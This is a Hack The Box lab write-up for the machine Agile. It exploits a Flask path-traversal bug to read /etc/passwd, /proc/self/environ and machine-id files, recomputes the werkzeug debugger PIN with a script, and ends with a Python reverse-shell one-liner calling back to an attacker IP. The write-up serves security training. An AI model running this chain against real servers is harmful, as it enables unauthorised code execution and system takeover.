# Agile - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Agile was a medium-rated Linux machine created by [0xdf](https://twitter.com/0xdf_)

The machine begins with a file disclosure vulnerability in a flask web application. The flask server was running in debug mode, and the file disclosure had to be used to deduce the flask debugger pin.  
Subsequent steps include exploring a database for credentials, credential reuse, and chrome debug mode.  
CVE-2023-22809 on `sudoedit` had to be abused for privilege escalation to root.

That aside, I've only included the most insightful bits in this document.  
Unlike my typical write-ups that get bogged down with generic steps, I want to focus on the more helpful elements.
For a comprehensive write-up, please refer to [0xdf's solutions](https://0xdf.gitlab.io/2023/08/05/htb-agile.html).

## Using File Disclosure to deduce the Flask Debugger Pin

The flask application on this machine is vulnerable to a generic file disclosure vulnerability:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../etc/passwd'

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
corum:x:1000:1000:corum:/home/corum:/bin/bash
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:109:112:MySQL Server,,,:/nonexistent:/bin/false
runner:x:1001:1001::/app/app-testing/:/bin/sh
edwards:x:1002:1002::/home/edwards:/bin/bash
dev_admin:x:1003:1003::/home/dev_admin:/bin/bash
_laurel:x:999:999::/var/log/laurel:/bin/false
```

Flask is also running in debug mode, evident from the interactive debugger encountered when trying to access a non-existent file:

![1](images/1.png)

Aside from the traceback, the debugger also allows arbitrary Python code execution from the browser, albeit protected by a pin:

![2](images/2.png)

It is possible to derive the pin from specific files in the filesystem.  
The concerned files are mostly identical across different versions of flask. However, there's still a tiny chance of variation.  
We can be sure only after looking at `werkzeug` source.

The traceback also reveals the absolute path to the virtual environment in which this flask application is running.  
The path to flask is `/app/venv/lib/python3.10/site-packages/flask/app.py`.  
Therefore, the logic for pin generation should be present in `/app/venv/lib/python3.10/site-packages/werkzeug/debug/__init__.py`  
It can be read with the file disclosure:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../app/venv/lib/python3.10/site-packages/werkzeug/debug/__init__.py'
```

In this file, `get_pin_and_cookie_name` is the relevant function:

```py
def get_pin_and_cookie_name(
    app: "WSGIApplication",
) -> t.Union[t.Tuple[str, str], t.Tuple[None, None]]:
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get("WERKZEUG_DEBUG_PIN")
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == "off":
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace("-", "").isdecimal():
        # If there are separators in the pin, return it directly
        if "-" in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)
    username: t.Optional[str]

    try:
        # getuser imports the pwd module, which does not exist in Google
        # App Engine. It may also raise a KeyError if the UID does not
        # have a username, such as in Docker.
        username = getpass.getuser()
    except (ImportError, KeyError):
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", type(app).__name__),
        getattr(mod, "__file__", None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [str(uuid.getnode()), get_machine_id()]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")

    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b"pinsalt")
        num = f"{int(h.hexdigest(), 16):09d}"[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = "-".join(
                    num[x : x + group_size].rjust(group_size, "0")
                    for x in range(0, len(num), group_size)
                )
                break
        else:
            rv = num

    return rv, cookie_name
```

It is evident from the code that the pin is generated using `probably_public_bits` and `private_bits`.  

```py
username = getpass.getuser()
modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)

mod = sys.modules.get(modname)

probably_public_bits = [
    username,
    modname,
    getattr(app, "__name__", type(app).__name__),
    getattr(mod, "__file__", None),
]
```

`username` should be the user who started the flask server.  
`modname` should be the module name, usually `flask.app`.

```py
private_bits = [str(uuid.getnode()), get_machine_id()]
```

`uuid.getnode()` returns the MAC address of a network interface.  
`get_machine_id()` is implemented in the same file. I've deleted the parts not relevant to Linux:

```py
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
    global _machine_id

    if _machine_id is not None:
        return _machine_id

    def _generate() -> t.Optional[t.Union[str, bytes]]:
        linux = b""

        # machine-id is stable across boots, boot_id is not.
        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
            try:
                with open(filename, "rb") as f:
                    value = f.readline().strip()
            except OSError:
                continue

            if value:
                linux += value
                break

        # Containers share the same machine id, add some cgroup
        # information. This is used outside containers too but should be
        # relatively stable across boots.
        try:
            with open("/proc/self/cgroup", "rb") as f:
                linux += f.readline().strip().rpartition(b"/")[2]
        except OSError:
            pass

        return linux

    _machine_id = _generate()
    return _machine_id
```

If it exists, `/etc/machine-id` is used for machine ID. Otherwise, `/proc/sys/kernel/random/boot_id` is used.  
The value is further concatenated with a part of `/proc/self/cgroup`

Let us observe the public and private bits with a toy flask application: [app.py](app.py)

```py
#!/usr/bin/env python3

import os.path
import sys
import uuid
import getpass
import typing as t
from flask import Flask, jsonify


app = Flask(__name__)


@app.route("/")
def pin_components():
    modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)

    bits = {}
    bits["username"] = getpass.getuser()
    bits["modname"] = modname
    bits["__name__"] = getattr(app, "__name__", type(app).__name__)
    bits["__file__"] = getattr(sys.modules.get(modname), "__file__", None)

    if os.path.isfile("/etc/machine-id"):
        machine_id = open("/etc/machine-id", "rb").readline().strip()
    else:
        machine_id = open("/proc/sys/kernel/random/boot_id", "rb").readline().strip()

    machine_id += open("/proc/self/cgroup", "rb").readline().strip().rpartition(b"/")[2]
    bits["machine_id"] = machine_id.decode()
    bits["mac"] = str(uuid.getnode())

    return jsonify(bits)


if __name__ == "__main__":
    app.run("0.0.0.0", 8000, debug=True)
```

Start the server:

```console
opcode@debian$ python3 app.py 
 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://192.168.xx.xx:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 136-156-909
```

Connect to the server:

```console
opcode@debian$ curl http://127.0.0.1:8000/
{
  "__file__": "/home/opcode/.local/lib/python3.11/site-packages/flask/app.py",
  "__name__": "Flask",
  "mac": "51241215782",
  "machine_id": "fa124e5b5aa746549b926026a612bd8csession-2.scope",
  "modname": "flask.app",
  "username": "opcode"
}
```

Now, let us walk through variations that I know of.

### Variations in `__file__`

`__file__` depends on the install location of flask on the system.  

```console
opcode@debian$ python3 -m venv venv
opcode@debian$ source venv/bin/activate
(venv) opcode@debian$ python3 -m pip install flask
(venv) opcode@debian$ python3 app.py              
 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://192.168.xx.xx:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 675-493-840
```

Since flask gets installed separately for virtual environments, the path changes:

```console
opcode@debian$ curl http://127.0.0.1:8000/
{
  "__file__": "/home/opcode/dbg/venv/lib/python3.11/site-packages/flask/app.py",
  "__name__": "Flask",
  "mac": "51241215782",
  "machine_id": "fa124e5b5aa746549b926026a612bd8csession-2.scope",
  "modname": "flask.app",
  "username": "opcode"
}
```

Project managers like Poetry and Rye use virtual environments under the hood. Therefore, they also have a different `__file__`.

### Variations in MAC

`uuid.getnode()` is inconsistent on Rye:

```console
opcode@debian$ rye show
project: newproj
path: /home/opcode/newproj
venv: /home/opcode/newproj/.venv
target python: 3.8
venv python: cpython@3.12.8
virtual: false
configured sources:
  default (index: https://pypi.org/simple/)

opcode@debian$ python3 -c "print(__import__('uuid').getnode())"
75971041544348
opcode@debian$ python3 -c "print(__import__('uuid').getnode())"
195642719276627
opcode@debian$ python3 -c "print(__import__('uuid').getnode())"
10123492854705
opcode@debian$ python3 -c "print(__import__('uuid').getnode())"
242004110455078
```

I have no clue why it is so.  
On the other hand, Poetry does not exhibit any behavior like that.

In Docker containers, the `eth0` interface gets assigned an IP address from the `docker0` subnet on the host.  
The default `docker0` subnet is `172.17.0.0/16`, but can also be changed.  
For docker containers, the MAC address can be calculated from IP addresses as such:

```console
opcode@debian$ python3 -c "print('02:42:' + ':'.join(f'{int(part):02x}' for part in '172.27.0.2'.split('.')))"
02:42:ac:1b:00:02
```

`uuid.getnode()` returns an integer version of the MAC address:

```console
opcode@debian$ python3 -c "print(int(''.join('02:42:ac:1b:00:02'.split(':')), 16))"
2485378547714
```

### Variations in machine ID

I tested with three commonly used container images: `3.13.2-bookworm`, `3.13.2-slim-bookworm` and `3.13.2-alpine3.21` and obtained identical observations on all of them.

```dockerfile
FROM python:3.13.2-bookworm

RUN pip install --no-cache-dir flask
EXPOSE 8000
WORKDIR /app
COPY app.py ./
CMD [ "python", "./app.py" ]
```

Build and start the server:

```console
opcode@debian$ docker build -t flask-bookworm .
opcode@debian$ docker run --rm -p 8000:8000 flask-bookworm
 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://172.27.0.2:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 151-798-222
```

I think docker containers do not have the `/etc/machine-id` file. Instead, they inherit the `/proc/sys/kernel/random/boot_id` from the host, and it gets used.

```console
opcode@debian$ curl http://127.0.0.1:8000/
{
  "__file__": "/usr/local/lib/python3.13/site-packages/flask/app.py",
  "__name__": "Flask",
  "mac": "2485378547714",
  "machine_id": "7d4fbad6-9dc1-4ca6-ce30-d1114fea2a4b",
  "modname": "flask.app",
  "username": "root"
}
```

There can be variations thanks to cgroups as well.  
`cgroupv2` is used by default on modern distros. Thanks to that, there are no variations on `/proc/self/cgroup` across containers if default docker options are used.  
On the older `cgroupv1`, `/proc/self/cgroup` used to be bloated as each controller had its own hierarchy.

Docker documentation also states that the content of `/proc/cgroups` isn't meaningful on cgroup v2 hosts.  
I expect `werkzeug` to get updated to use something else instead.

### Variations in username

It changes based on the user who ran it.  
If `USER` is not specified within `Dockerfile`, `root` is used.  
If run as a service using `systemctl`, it runs as the user specified in the systemd service file.

### Variations in `__name__`

Before attempting the machine Agile, I was unaware that `__name__` could vary.  
Using the file disclosure, we can check `/proc/self/cmdline` to learn how the flask server was started:

```console
opcode@debian$ curl -s -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/self/cmdline' --output - | cat -v
/app/venv/bin/python3^@/app/venv/bin/gunicorn^@--bind^@127.0.0.1:5000^@--threads=10^@--timeout^@600^@wsgi:app
```

`gunicorn` is being used. `gunicorn` does not respect `debug=True`, yet we have this instance running in debug mode.  
To get to the bottom of this, we can look at the source code of the running application:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/self/cwd/wsgi.py'
```

The filename `wsgi.py` can be deduced from the `gunicorn` command.

```py
from superpass.app import app, main, enable_debug

enable_debug()

if __name__ == "__main__":
    main()
```

`enable_debug` is defined inside `app.py` in `superpass` directory.

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/self/cwd/superpass/app.py'
```

Here's the relevant part:

```py
def enable_debug():
    from werkzeug.debug import DebuggedApplication
    app.wsgi_app = DebuggedApplication(app.wsgi_app, True)
    app.debug = True


def main():
    enable_debug()
    configure()
    app.run(debug=True)
```

We can replicate those parts in the toy application as well: [wsgi.py](wsgi.py)

```py
#!/usr/bin/env python3

import os.path
import sys
import uuid
import getpass
import typing as t
from flask import Flask, jsonify


app = Flask(__name__)


@app.route("/")
def pin_components():
    modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)

    bits = {}
    bits["username"] = getpass.getuser()
    bits["modname"] = modname
    bits["__name__"] = getattr(app, "__name__", type(app).__name__)
    bits["__file__"] = getattr(sys.modules.get(modname), "__file__", None)

    if os.path.isfile("/etc/machine-id"):
        machine_id = open("/etc/machine-id", "rb").readline().strip()
    else:
        machine_id = open("/proc/sys/kernel/random/boot_id", "rb").readline().strip()

    machine_id += open("/proc/self/cgroup", "rb").readline().strip().rpartition(b"/")[2]
    bits["machine_id"] = machine_id.decode()
    bits["mac"] = str(uuid.getnode())

    return jsonify(bits)


@app.route("/wheatley")
def divbyzero():
    return 1/0


if __name__ == "__main__":
    from werkzeug.debug import DebuggedApplication
    app.wsgi_app = DebuggedApplication(app.wsgi_app, True)
    app.debug = True
    app.run("0.0.0.0", 8000, debug=True)
```

I've also added a route just to throw an error. Its purpose would soon become apparent.  
We'd observe something funny when this app is run:

```console
(venv) opcode@debian$ python3 wsgi.py
 * Serving Flask app 'wsgi'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://192.168.xx.xx:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 479-309-459
 * Debugger is active!
 * Debugger PIN: 675-493-840
```

There are two unique pins here. One is valid on `/console`, while the other is valid inside the interactive debugger obtained whenever an unhandled error is encountered.  
Figuring out the cause of the difference between these two PINs was not straightforward.  
In the virtual environment, I modified the function `get_pin_and_cookie_name` inside `venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py`.  
Under the line `private_bits = [str(uuid.getnode()), get_machine_id()]`, I added:

```py
    print(probably_public_bits, private_bits)
```

Now,

```console
opcode@debian$ python3 wsgi.py
 * Serving Flask app 'wsgi'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://192.168.xx.xx:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
['opcode', 'flask.app', 'wsgi_app', '/home/opcode/dbg/venv/lib/python3.11/site-packages/flask/app.py'] ['51241215782', b'fa124e5b5aa746549b926026a612bd8csession-2.scope']
 * Debugger PIN: 479-309-459
 * Debugger is active!
['opcode', 'flask.app', 'Flask', '/home/opcode/dbg/venv/lib/python3.11/site-packages/flask/app.py'] ['51241215782', b'fa124e5b5aa746549b926026a612bd8csession-2.scope']
 * Debugger PIN: 675-493-840
```

For one of the pins, `wsgi_app` is used as `__name__` instead of `Flask` to generate the pin.

### Issue with reading files in `/proc`

While reading the contents of `/proc/self/cgroup` and `/proc/sys/kernel/random/boot_id` via file disclosure vulnerabilities, a blank response is sometimes received.  
Since I've already explained it in [another write-up](https://gitlab.com/0pcode/htb-scribbles/-/blob/main/Boxes/OpenSource/README.md#issue-with-reading-proc-through-lfr), and no such issue occurs on this machine, I'd not repeat it here.

## Determining the debugger pin

We had obtained `__file__` from traceback on interactive debugger:

```text
/app/venv/lib/python3.10/site-packages/flask/app.py
```

We also know the `__name__` thanks to the previous section:

```text
wsgi_app
```

File disclosure can be used to obtain the MAC address:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/net/arp'
IP address       HW type     Flags       HW address            Mask     Device
10.129.0.1       0x1         0x2         00:50:56:b9:ac:f1     *        eth0
```

`eth0` interface is in use.

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../sys/class/net/eth0/address'
00:50:56:b9:ab:04
```

`uuid.getnode()` returns an integer version of the MAC address:

```console
opcode@debian$ python3 -c "print(int(''.join('00:50:56:b9:ab:04'.split(':')), 16))"
345052392196
```

For machine ID, `/etc/machine-id` gets used:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../etc/machine-id'
ed5b159560f54721827644bc9b220d00
```

And `/proc/self/cgroup`:

```console
opcode@debian$ curl -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/self/cgroup'
0::/system.slice/superpass.service
```

We need a certain section of it:

```console
opcode@debian$ python3 -c "print(b'0::/system.slice/superpass.service'.rpartition(b'/')[2].decode())"
superpass.service
```

Therefore, Machine ID is:

```text
ed5b159560f54721827644bc9b220d00superpass.service
```

`modname` should be:

```text
flask.app
```

`username` can be obtained from environment variables:

```console
opcode@debian$ curl -s -b 'session=.eJwlzjEOwzAIQNG7MHfAGDDOZSJsg9o1aaaqd2-krn_4eh_Y84jzCdv7uOIB-2vBBpSzRcVstnwtrGLdufnk8FZIizK6iUaoag0sLBXxDjZyrG4Sc9TivbT0IXMNFkvKykjzHvJI0hZkxhburkki4ay0jFRHSbgh1xnHX9Ph-wPM-y-l.Z8GjIQ.bF5ayM8xDJbMQSiKCOsUTKiPgSM' 'http://superpass.htb/download?fn=../proc/self/environ' --output - | cat -v
LANG=C.UTF-8^@PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin^@HOME=/var/www^@LOGNAME=www-data^@USER=www-data^@INVOCATION_ID=1a0db9d2065c4bc0a193a6eac8c683f2^@JOURNAL_STREAM=8:32916^@SYSTEMD_EXEC_PID=1073^@CONFIG_PATH=/app/config_prod.json
```

Therefore, `username` is:

```text
www-data
```

I wrote [generate_pin.py](generate_pin.py) to use those values and determine the pin:

```py
import hashlib
from itertools import chain


def generate_pin(probably_public_bits, private_bits):
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")

    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    num = None
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

    rv = None
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

    return rv


if __name__ == "__main__":
    dunder_file = "/app/venv/lib/python3.10/site-packages/flask/app.py"
    dunder_name = "wsgi_app"
    mac = "345052392196"
    machine_id = "ed5b159560f54721827644bc9b220d00superpass.service"
    modname = "flask.app"
    username = "www-data"

    private_bits = [mac, machine_id]
    probably_public_bits = [username, modname, dunder_name, dunder_file]

    print(generate_pin(probably_public_bits, private_bits))
```

```console
opcode@debian$ python3 generate_pin.py 
529-855-468
```

I used this pin on the interactive debugger and got code execution:

```py
[console ready]
>>> from subprocess import check_output, STDOUT
>>> check_output('id; exit 0', stderr=STDOUT, shell=True)
b'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
```

The following one-liner can be used to obtain a reverse shell:

```py
>>> import socket,os,pty; s=socket.socket(); s.connect(('10.10.14.52',9001)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')
```
